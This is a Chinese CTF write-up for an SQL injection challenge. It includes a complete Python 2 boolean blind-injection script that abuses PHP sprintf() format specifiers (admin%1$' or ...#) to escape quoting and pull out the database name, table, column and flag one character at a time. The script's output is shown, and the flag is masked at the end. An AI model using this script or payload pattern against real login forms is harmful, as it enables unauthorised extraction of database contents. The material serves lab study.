0x01
本题所需知识清单:
1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447
2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445
3.Burpsuit Intruder暴力猜解:https://blog.csdn.net/snert/article/details/49749757
4.盲注python(2)脚本:
#coding:utf-8
import requests
import string
def boom():
url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'
s = requests.session()
#会话对象requests.Session能够跨请求地保持某些参数,比如cookies,即在同一个Session实例发出的所有请求都保持同一个cookies,而requests模块每次会自动处理cookies,这样就很方便地处理登录时的cookies问题。
dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
right = 'password error!'
error = 'username error!'
lens = 0
i = 0
#确定当前数据库的长度
while True:
payload = "admin%1$\' or " + "length(database())>" + str(i) + "#"
data={'username':payload,'password':1}
r = s.post(url,data=data).content
if error in r:
lens=i
break
i+=1
pass
print("[+]length(database()): %d" %(lens))
#确定当前数据库的名字
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if right in r:
strs = strs + c
print strs
break
pass
pass
print("[+]database():%s" %(strs))
lens=0
i = 1
while True:
payload = "admin%1$\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
#对当前的数据库,查询第一个表的长度
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if error in r:
lens = i
break
i+=1
pass
print("[+]length(table): %d" %(lens))
#查询第一个表的名称
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
# 数字一定要str才可以传入
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if right in r:
strs = strs + c
print strs
break
pass
pass
print("[+]table_name:%s" %(strs))
tablename = '0x' + strs.encode('hex')
#编码为16进制
table_name = strs
lens=0
i = 0
while True:
payload = "admin%1$\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if error in r:
lens = i
break
i+=1
pass
print("[+]length(column): %d" %(lens))
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if right in r:
strs = strs + c
print strs
break
pass
pass
print("[+]column_name:%s" %(strs))
column_name = strs
num=0
i = 0
while True:
payload = "admin%1$\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if error in r:
num = i
break
i+=1
pass
print("[+]number(column): %d" %(num))
lens=0
i = 0
while True:
payload = "admin%1$\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
data = {'username':payload,'password':1}
r = s.post(url,data=data).content
if error in r:
lens = i
break
i+=1
pass
print("[+]length(value): %d" %(lens))
i=1
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username':payload,'password':'1'}
r = s.post(url,data=data).content
if right in r:
strs = strs + c
print strs
break
pass
pass
print("[+]flag:%s" %(strs))
if __name__ == '__main__':
boom()
print 'Finish!'0x02解题具体流程
#1. 根据题目SQLI可猜测本题可能为SQL注入
#2.尝试弱口令当username=admin显示密码错误而不是用户名错误可知用户名为admin
#3.使用普通的注入方法:https://blog.csdn.net/WQ_BCJ/article/details/85216275
无果,可以利用burpsuit上的Intruder看那些字符没有被过滤掉,具体使用方法在上面知识清单部分
破解结果为:对比多条length长度异常后发现%字符没有被过滤,且在respone里面发现sprintf()函数的报错(参数太少)
猜测可以利用sprintf()函数进行注入,下面来验证
#4.输入username=admin%1$' and 1=1 # 得到的结果是username error ,换成or则显示password error,证明admin后面的or 1=1 #被执行成功了,验证成功接下来就是盲注时间了:
#5.利用脚本得到flag:脚本及盲注基础知识知识清单处有详细介绍
D:Python2.7python2.exe F:/pycharm_work/sqli/sql.py
[+]length(database()): 3
c
ct
ctf
[+]database():ctf
[+]length(table): 4
f
fl
fla
flag
[+]table_name:flag
[+]length(column): 4
f
fl
fla
flag
[+]column_name:flag
[+]number(column): 1
[+]length(value): 42
f
fl
fla
flag
flag{
flag{b
flag{b5
flag{b5b
flag{b5b3
flag{b5b36
flag{b5b361
flag{b5b3612
flag{b5b36121
flag{b5b36121-
flag{b5b36121-8
flag{b5b36121-86
flag{b5b36121-86d
flag{b5b36121-86dd
flag{b5b36121-86dd-
flag{b5b36121-86dd-a
flag{b5b36121-86dd-a4
flag{b5b36121-86dd-a4d
flag{b5b36121-86dd-a4db
flag{b5b36121-86dd-a4db-
flag{b5b36121-86dd-a4db-a
flag{b5b36121-86dd-a4db-aa
flag{b5b36121-86dd-a4db-aab
flag{b5b36121-86dd-a4db-aab3
flag{b5b36121-86dd-a4db-aab3-
flag{b5b36121-86dd-a4db-aab3-8
flag{b5b36121-86dd-a4db-aab3-86
flag{b5b36121-86dd-a4db-aab3-86d
flag{b5b36121-86dd-a4db-aab3-86dd
flag{b5b36121-86dd-a4db-aab3-86ddb
flag{b5b36121-86dd-a4db-aab3-86ddb7
flag{b5b36121-86dd-a4db-aab3-86ddb74
flag{b5b36121-86dd-a4db-aab3-86ddb749
flag{b5b36121-86dd-a4db-aab3-86ddb749d
flag{b5b36121-86dd-a4db-aab3-86ddb749df
flag{b5b36121-86dd-a4db-aab3-86ddb749dfa
flag{自个做一遍去}
Finish!
Process finished with exit code 0